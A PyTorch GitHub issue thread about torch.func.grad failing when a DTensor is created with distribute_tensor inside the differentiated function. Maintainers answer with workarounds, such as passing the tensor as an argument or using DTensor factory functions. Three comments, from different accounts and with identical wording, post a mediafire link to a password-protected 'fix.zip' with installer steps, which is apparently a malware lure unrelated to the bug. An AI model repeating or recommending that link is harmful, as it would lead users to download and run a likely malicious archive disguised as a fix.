### ISSUE TITLE
Cannot create and distribute array in torch.nn.grad

### ISSUE THREAD

**Issue by abdussamettrkr** [pytorch/pytorch#134462]
### 🐛 Describe the bug

While experimenting with PyTorch's DTensor functionality in my single node "cpu" environment, I've encountered an unexpected limitation when using functional APIs. Specifically, in the provided code example, I'm attempting to use torch.func.grad to compute gradients of a forward function that involves distributed tensors (DTensors) created with distribute_tensor.

The forward function includes an operation that creates a new distributed tensor using torch.rand within its body. However, when trying to apply torch.func.grad to this function, I'm unable to create these dynamic tensors. 

Repro:

```python
from functools import partial

import os
import torch
import torch.distributed as dist
from torch.func import grad
from torch.distributed._tensor import DeviceMesh, init_device_mesh, distribute_tensor, Shard, Replicate


def forward(weight, input, device_mesh: DeviceMesh):
    res = input @ weight
    rand = distribute_tensor(torch.rand(res.shape), device_mesh, [Replicate(), Replicate()])
    res += rand
    return res

def run():
    rank = int(os.environ['RANK'])
    world_size = int(os.environ['WORLD_SIZE'])

    # Initialize the process group
    dist.init_process_group("gloo", rank=rank, world_size=world_size)

    device_mesh = init_device_mesh("cpu", (world_size, 1))

    input = torch.ones(256, 128)
    weight = torch.ones(128, 256)

    input_d = distribute_tensor(input, device_mesh, [Shard(0), Replicate()])
    weight_d = distribute_tensor(weight, device_mesh, [Replicate(), Replicate()])

    _forward = partial(forward, input=input_d, device_mesh=device_mesh)
    grads = grad(_forward)(weight_d)
    
    if rank == 0:
        print(grads)

    # Clean up the process group
    dist.destroy_process_group()

if __name__ == "__main__":
    run()```

### Versions

PyTorch version: 2.4.0
Is debug build: False
CUDA used to build PyTorch: None
ROCM used to build PyTorch: N/A

OS: macOS 14.6.1 (arm64)
GCC version: Could not collect
Clang version: 15.0.0 (clang-1500.1.0.2.5)
CMake version: version 3.28.1
Libc version: N/A

Python version: 3.11.0 (main, Mar  1 2023, 12:33:14) [Clang 14.0.6 ] (64-bit runtime)
Python platform: macOS-14.6.1-arm64-arm-64bit
Is CUDA available: False
CUDA runtime version: No CUDA
CUDA_MODULE_LOADING set to: N/A
GPU models and configuration: No CUDA
Nvidia driver version: No CUDA
cuDNN version: No CUDA
HIP runtime version: N/A
MIOpen runtime version: N/A
Is XNNPACK available: True

CPU:
Apple M2 Pro

Versions of relevant libraries:
[pip3] numpy==1.26.0
[pip3] torch==2.4.0
[conda] numpy                     1.26.0                   pypi_0    pypi
[conda] torch                     2.4.0                    pypi_0    pypi

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tianyu-l** [comment]
I played with your example.

The problem happens on `rand = distribute_tensor(torch.rand(res.shape), device_mesh, [Replicate(), Replicate()])` which calls `Tensor.requires_grad_()` here: https://github.com/pytorch/pytorch/blob/main/torch/distributed/_tensor/api.py#L761

Do you think you have to do this creation of `rand` within the function being functionalized, i.e. `forward`? There won't be issue if you make it an arg, similar to `input` and `device_mesh`. By the way, the output of `forward` needs to be a scalar, otherwise gradient doesn't make sense.

**Comment by abdussamettrkr** [comment]
Thanks for your detailed reply. I understand the suggestion to pass rand as an argument to the `forward` function instead of creating it within. But, I believe the ability to create tensors dynamically  is important for more complex scenarios, especially when working with distributed tensor operations where tensor shapes and distributions might not be known in advance.

**Comment by tianyu-l** [comment]
Hi @albanD @zou3519 , can you please help tag functorch experts to answer the composability question?

@abdussamettrkr 
While we are waiting for answers, to unblock, can you just use `requires_grad = True` for `weight`, instead of `torch.func.grad` to obtain gradient?

**Comment by wanchaol** [comment]
> I understand the suggestion to pass rand as an argument to the `forward` function instead of creating it within. But, I believe the ability to create tensors dynamically is important for more complex scenarios, especially when working with distributed tensor operations where tensor shapes and distributions might not be known in advance.

@aturker1 I think this make sense, however I think `distribute_tensor` is the API to "distribute the full tensor" on all ranks, so it starts with full shape torch.tensor, shard it, then actually involves communications (i.e. for shard is a scatter, replicate is a broadcast). It is used more on sharding leaf tensors, i.e. nn.Parameters, that's why it redo `requires_grad_`, and `detach()` to restore the original leaf tensor state.

For dynamically created `rand` or tensor constructors, I think it's more proper to use the DTensor native tensor factory methods, i.e. `torch.distributed.tensor.rand` https://pytorch.org/docs/stable/distributed.tensor.html#dtensor-factory-functions

Let us know if that works for you
